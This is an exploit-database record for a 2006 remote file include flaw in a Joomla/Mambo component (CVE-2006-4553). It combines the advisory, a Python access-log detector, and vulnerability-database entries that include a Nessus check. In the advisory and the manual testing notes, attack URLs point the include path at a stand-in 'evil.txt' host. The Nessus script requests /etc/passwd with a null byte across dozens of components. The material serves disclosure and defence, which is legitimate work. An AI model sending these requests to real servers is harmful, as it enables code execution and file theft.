Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability
2006-08-26T00:00:00
ID: EDB-ID:28437 | Type: exploitdb | Reporter: Matdhule | Modified: 2006-08-26T00:00:00
Description
Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability. CVE-2006-4553. Web application exploit for the PHP platform.
source: http://www.securityfocus.com/bid/19725/info
The Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
Version 1.0 RC2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.example.com/evil.txt?
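The advisory above describes the vector (a request that overrides the mosConfig_absolute_path configuration global, which only works with register_globals enabled) and the Nessus record further down shows the same parameter used with a null-byte local path. The following detection script is an added example for defenders and is not part of the advisory or the exploit-db record: it parses combined-format web server access logs, flags any request that sets mosConfig_absolute_path in the query string, and classifies the value (remote URL, null-byte local path, or plain override). The log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Configuration globals that the affected scripts consumed as trusted input
# when register_globals was on. Only the parameter named in the advisory is
# listed; extend the set if other globals should be watched.
WATCHED_PARAMS = {"mosConfig_absolute_path"}

# Combined log format: ip ident user [timestamp] "METHOD target HTTP/x.y" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A value that starts with a URL scheme (http://, ftp://, php://, ...)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample log lines (not real traffic). Line 1 mirrors the advisory's
# vector, line 2 the null-byte local-file variant used by the Nessus check,
# line 3 is benign, line 4 carries a URL-encoded scheme.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Aug/2006:10:01:02 +0000] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://198.51.100.7/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [26/Aug/2006:10:01:05 +0000] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=/etc/passwd%00 HTTP/1.1" 500 0 "-" "Mozilla/4.0"
192.0.2.10 - - [26/Aug/2006:10:02:00 +0000] "GET /index.php?option=com_comprofiler&task=userProfile HTTP/1.1" 200 9321 "-" "Mozilla/5.0"
192.0.2.11 - - [26/Aug/2006:10:02:30 +0000] "GET /administrator/index.php?mosConfig_absolute_path=ftp%3A%2F%2F198.51.100.7%2Fx HTTP/1.1" 200 100 "-" "curl/7.15"
"""


def classify_value(value):
    """Describe why a watched parameter value is suspicious; None if no specific pattern."""
    if SCHEME_RE.match(value):
        return "remote URL supplied as include base path"
    if "\x00" in value:
        return "null byte in include base path (local file read attempt)"
    if value.startswith("/") or ".." in value:
        return "absolute or traversal path supplied as include base path"
    return None


def scan_line(line):
    """Return a finding dict for a request that sets a watched global, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so %00 and %3A%2F%2F are seen in decoded form
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in WATCHED_PARAMS:
            # No legitimate client sets this parameter at all, so its mere
            # presence is reportable even when no specific pattern matches.
            reason = classify_value(value) or "configuration global overridden via request"
            return {
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "path": parts.path,
                "param": name,
                "value": value,
                "reason": reason,
            }
    return None


def scan_log(text):
    """Scan every line of an access log and collect the findings."""
    return [f for f in (scan_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['status']} {finding['path']}: {finding['reason']} ({finding['value']!r})")
```

The check inspects only the request line, so parameters delivered in a POST body or cookie (which register_globals also imported) are not visible here; the matching is case-sensitive because PHP variable names are. Where the response status is 200 with a remote URL value, the request merits priority review, since the included file would have been executed rather than rejected.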
{"id": "EDB-ID:28437", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability", "description": "Mambo/Joomla Com_comprofiler 1.0 Plugin.class.PHP Remote File Include Vulnerability. CVE-2006-4553. Webapps exploit for php platform", "published": "2006-08-26T00:00:00", "modified": "2006-08-26T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/28437/", "reporter": "Matdhule", "references": [], "cvelist": ["CVE-2006-4553"], "lastseen": "2016-02-03T08:10:23", "viewCount": 20, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-02-03T08:10:23", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4553"]}, {"type": "osvdb", "idList": ["OSVDB:28241"]}, {"type": "nessus", "idList": ["MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL"]}], "modified": "2016-02-03T08:10:23", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://www.exploit-db.com/download/28437/", "sourceData": "source: http://www.securityfocus.com/bid/19725/info\r\n\r\nThe Mambo and Joomla com_comprofiler component is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.\r\n\r\nAn attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.\r\n\r\nVersion 1.0 RC2 is vulnerable to this issue; other versions may also be affected.\r\n\r\nhttp://www.example.com/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.example.com/evil.txt?", "osvdbidlist": ["28241"], "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "PHP remote file inclusion vulnerability in plugin.class.php in the com_comprofiler Components 1.0 RC2 for Mambo and Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 4, "cvss3": {}, "published": "2006-09-06T00:04:00", "title": "CVE-2006-4553", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4553"], "modified": "2018-10-17T21:37:00", "cpe": ["cpe:/a:joomla:com_comprofiler_component:1.0_rc2", "cpe:/a:mambo:com_comprofiler_component:1.0_rc2"], "id": "CVE-2006-4553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4553", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mambo:com_comprofiler_component:1.0_rc2:*:*:*:*:*:*:*", "cpe:2.3:a:joomla:com_comprofiler_component:1.0_rc2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "bulletinFamily": "software", "cvelist": ["CVE-2006-4553"], "edition": 1, "description": "## Vulnerability Description\nCommunity Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to plugin.class.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. 
This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nUpgrade to version 1.0.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nCommunity Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to plugin.class.php not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://[attacker]/evil.txt?\n## References:\nVendor URL: http://www.joomla.org/\nVendor Specific News/Changelog Entry: http://www.joomlapolis.com/content/view/1538/37/\nVendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,84436.0.html\nVendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html\n[Secunia Advisory ID:21636](https://secuniaresearch.flexerasoftware.com/advisories/21636/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0488.html\n[CVE-2006-4553](https://vulners.com/cve/CVE-2006-4553)\nBugtraq ID: 19725\n", "modified": "2006-08-25T04:19:27", "published": "2006-08-25T04:19:27", "href": "https://vulners.com/osvdb/OSVDB:28241", "id": "OSVDB:28241", "type": "osvdb", "title": "Community Builder for Joomla plugin.class.php mosConfig_absolute_path Variable Remote File Inclusion", "cvss": {"score": 6.8, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-20T12:09:16", "description": "A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.", "edition": 32, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2006-07-15T00:00:00", "title": "Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "modified": "2006-07-15T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/nessus/22049", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, 
Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22049);\n script_version(\"1.110\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2006-3396\",\n \"CVE-2006-3530\",\n \"CVE-2006-3556\",\n \"CVE-2006-3748\",\n \"CVE-2006-3749\",\n \"CVE-2006-3750\",\n \"CVE-2006-3751\",\n \"CVE-2006-3773\",\n \"CVE-2006-3774\",\n \"CVE-2006-3846\",\n \"CVE-2006-3947\",\n \"CVE-2006-3949\",\n \"CVE-2006-3980\",\n \"CVE-2006-3995\",\n \"CVE-2006-4074\",\n \"CVE-2006-4130\",\n \"CVE-2006-4195\",\n \"CVE-2006-4270\",\n \"CVE-2006-4288\",\n \"CVE-2006-4553\",\n \"CVE-2006-4858\",\n \"CVE-2006-5045\",\n \"CVE-2006-5048\",\n \"CVE-2006-5519\",\n \"CVE-2006-6962\",\n \"CVE-2007-1702\",\n \"CVE-2007-2005\",\n \"CVE-2007-2144\",\n \"CVE-2007-2319\",\n \"CVE-2007-3130\",\n \"CVE-2007-5310\",\n \"CVE-2007-5412\",\n \"CVE-2007-5457\",\n \"CVE-2008-0567\",\n \"CVE-2008-5789\",\n \"CVE-2008-5790\",\n \"CVE-2008-5793\",\n \"CVE-2008-6841\",\n \"CVE-2010-2918\"\n );\n script_bugtraq_id(\n 18705,\n 18808,\n 18876,\n 18919,\n 18924,\n 18968,\n 18991,\n 19037,\n 19042,\n 19044,\n 19047,\n 19100,\n 19217,\n 19222,\n 19223,\n 19224,\n 19233,\n 19373,\n 19465,\n 19505,\n 19574,\n 19581,\n 19725,\n 20018,\n 20667,\n 23125,\n 23408,\n 23490,\n 23529,\n 24342,\n 25959,\n 26002,\n 26044,\n 27531,\n 28942,\n 30093,\n 32190,\n 32192,\n 32194\n );\n script_xref(name:\"EDB-ID\", value:\"1959\");\n script_xref(name:\"EDB-ID\", value:\"2020\");\n script_xref(name:\"EDB-ID\", value:\"2023\");\n script_xref(name:\"EDB-ID\", value:\"2029\");\n script_xref(name:\"EDB-ID\", value:\"2083\");\n script_xref(name:\"EDB-ID\", value:\"2089\");\n script_xref(name:\"EDB-ID\", value:\"2125\");\n script_xref(name:\"EDB-ID\", value:\"2196\");\n script_xref(name:\"EDB-ID\", value:\"2205\");\n script_xref(name:\"EDB-ID\", value:\"2206\");\n script_xref(name:\"EDB-ID\", value:\"2207\");\n 
script_xref(name:\"EDB-ID\", value:\"2214\");\n script_xref(name:\"EDB-ID\", value:\"2367\");\n script_xref(name:\"EDB-ID\", value:\"2613\");\n script_xref(name:\"EDB-ID\", value:\"3567\");\n script_xref(name:\"EDB-ID\", value:\"3703\");\n script_xref(name:\"EDB-ID\", value:\"3753\");\n script_xref(name:\"EDB-ID\", value:\"4497\");\n script_xref(name:\"EDB-ID\", value:\"4507\");\n script_xref(name:\"EDB-ID\", value:\"4521\");\n script_xref(name:\"EDB-ID\", value:\"5020\");\n script_xref(name:\"EDB-ID\", value:\"5497\");\n script_xref(name:\"EDB-ID\", value:\"6003\");\n script_xref(name:\"EDB-ID\", value:\"7038\");\n script_xref(name:\"EDB-ID\", value:\"7039\");\n script_xref(name:\"EDB-ID\", value:\"7040\");\n\n script_name(english:\"Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities\");\n script_summary(english:\"Attempts to read a local file using Mambo / Joomla components and modules.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. 
Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439035/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439451/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439618/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439963/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439997/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/440881/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441533/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441538/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441541/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/444425/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0607-exploits/smf.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the PHP 'register_globals' setting or contact the product's\nvendor to see if an upgrade exists.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Extcalendar RFI\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mambo_detect.nasl\", \"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\n# Generate a list of paths to check.\nmambo = get_dirs_from_kb(appname:'mambo_mos', port:port);\nif (isnull(mambo)) mambo = make_list();\n\njoomla = make_list();\njoomla_installs = get_installs(\n app_name : \"Joomla!\",\n port : port\n);\n\nif (joomla_installs[0] == IF_OK)\n{\n foreach install (joomla_installs[1])\n {\n dir = install['path'];\n joomla = make_list(dir, joomla);\n }\n}\n\ndirs = make_list(mambo, joomla);\n\nif (max_index(dirs) == 0)\n audit(AUDIT_WEB_APP_NOT_INST, \"Joomla! / Mambo\", port);\n\n# Vulnerable scripts.\n# - components.\nncoms = 0;\ncom = make_array();\n# - A6MamboCredits\ncom[ncoms++] = \"/administrator/components/com_a6mambocredits/admin.a6mambocredits.php\";\n# - Art*Links\ncom[ncoms++] = \"/components/com_artlinks/artlinks.dispnew.php\";\n# - Chrono Forms\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS/File.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php\";\n# - Clickheat\ncom[ncoms++] = \"/administrator/components/com_clickheat/install.clickheat.php\";\ncom[ncoms++] = 
\"/administrator/components/com_clickheat/includes/heatmap/_main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/overview/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php\";\n# - Community Builder\ncom[ncoms++] = \"/administrator/components/com_comprofiler/plugin.class.php\";\n# - Coppermine Photo Gallery\ncom[ncoms++] = \"/components/com_cpg/cpg.php\";\n# - DBQ Manager\ncom[ncoms++] = \"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php\";\n# - ExtCalendar\ncom[ncoms++] = \"/components/com_extcalendar/extcalendar.php\";\n# - Feederator\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/subscription.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/tmsp.php\";\n# - Galleria\ncom[ncoms++] = \"/components/com_galleria/galleria.html.php\";\n# - Hashcash\ncom[ncoms++] = \"/components/com_hashcash/server.php\";\n# - HTMLArea3\ncom[ncoms++] = \"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php\";\n# - JD-Wiki\ncom[ncoms++] = \"/components/com_jd-wiki/lib/tpl/default/main.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/dwpage.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/wantedpages.php\";\n# - Joomla Flash Uploader\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php\";\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php\";\n# - 
JoomlaPack\ncom[ncoms++] = \"/administrator/components/com_jpack/includes/CAltInstaller.php\";\n# - Joomla-Visites\ncom[ncoms++] = \"/administrator/components/com_joomla-visites/core/include/myMailer.class.php\";\n# - Link Directory\ncom[ncoms++] = \"/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php\";\n# - LoudMouth\ncom[ncoms++] = \"/components/com_loudmouth/includes/abbc/abbc.class.php\";\n# - Mambatstaff\ncom[ncoms++] = \"/components/com_mambatstaff/mambatstaff.php\";\n# - MambelFish\ncom[ncoms++] = \"/administrator/components/com_mambelfish/mambelfish.class.php\";\n# - Mambo Gallery Manager\ncom[ncoms++] = \"/administrator/components/com_mgm/help.mgm.php\";\n# - Mosets Tree\ncom[ncoms++] = \"/components/com_mtree/Savant2/Savant2_Plugin_textarea.php\";\n# - mp3_allopass\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass.php\";\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass-error.php\";\n# - Multibanners\ncom[ncoms++] = \"/administrator/components/com_multibanners/extadminmenus.class.php\";\n# - PCCookbook\ncom[ncoms++] = \"/components/com_pccookbook/pccookbook.php\";\n# - Peoplebook\ncom[ncoms++] = \"/administrator/components/com_peoplebook/param.peoplebook.php\";\n# - perForms\ncom[ncoms++] = \"/components/com_performs/performs.php\";\n# - phpShop\ncom[ncoms++] = \"/administrator/components/com_phpshop/toolbar.phpshop.html.php\";\n# - PollXT\ncom[ncoms++] = \"/administrator/components/com_pollxt/conf.pollxt.php\";\n# - Recly!Competitions\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/add.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/competitions.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/settings/settings.php\";\n# - Remository\ncom[ncoms++] = \"/administrator/components/com_remository/admin.remository.php\";\n# - rsGallery\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.php\";\ncom[ncoms++] = 
\"/components/com_rsgallery2/rsgallery2.html.php\";\n# - Security Images\ncom[ncoms++] = \"/administrator/components/com_securityimages/configinsert.php\";\ncom[ncoms++] = \"/administrator/components/com_securityimages/lang.php\";\n# - Serverstat\ncom[ncoms++] = \"/administrator/components/com_serverstat/install.serverstat.php\";\n# - SiteMap\ncom[ncoms++] = \"/components/com_sitemap/sitemap.xml.php\";\n# - SMF Forum\ncom[ncoms++] = \"/components/com_smf/smf.php\";\n# - Taskhopper\ncom[ncoms++] = \"/components/com_thopper/inc/contact_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/itemstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/projectstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/request_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/responses_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/timelog_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/urgency_type.php\";\n# - User Home Pages\ncom[ncoms++] = \"/administrator/components/com_uhp/uhp_config.php\";\ncom[ncoms++] = \"/administrator/components/com_uhp2/footer.php\";\n# - VideoDB\ncom[ncoms++] = \"/administrator/components/com_videodb/core/videodb.class.xml.php\";\n# - WmT Portfolio\ncom[ncoms++] = \"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php\";\n# - modules.\nnmods = 0;\nmod = make_array();\n# - Autostand\nmod[nmods++] = \"/mod_as_category.php\";\nmod[nmods++] = \"/mod_as_category/mod_as_category.php\";\n# - FlatMenu\nmod[nmods++] = \"/mod_flatmenu.php\";\n# - MambWeather\nmod[nmods++] = \"/MambWeather/Savant2/Savant2_Plugin_options.php\";\n\n\n# Loop through each directory.\ninfo = \"\";\ncontents = \"\";\nforeach dir (list_uniq(dirs))\n{\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<ncoms; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + com[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], 
w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + com[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n\n for (i=0; i<nmods; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + \"/modules/\" + mod[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + \"/modules/\" + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n}\n\nif (info)\n{\n if (empty_or_null(contents)) contents = 'The response output includes an error message which indicates that the installed component is affected. Below is the response : \\n\\n' + res;\n\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : \"/etc/passwd\",\n request : split(info),\n output : contents,\n attach_type : 'text/plain'\n );\n exit(0);\n}\nelse\n exit(0, \"No affected components were found on the web server on port \"+port+\".\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}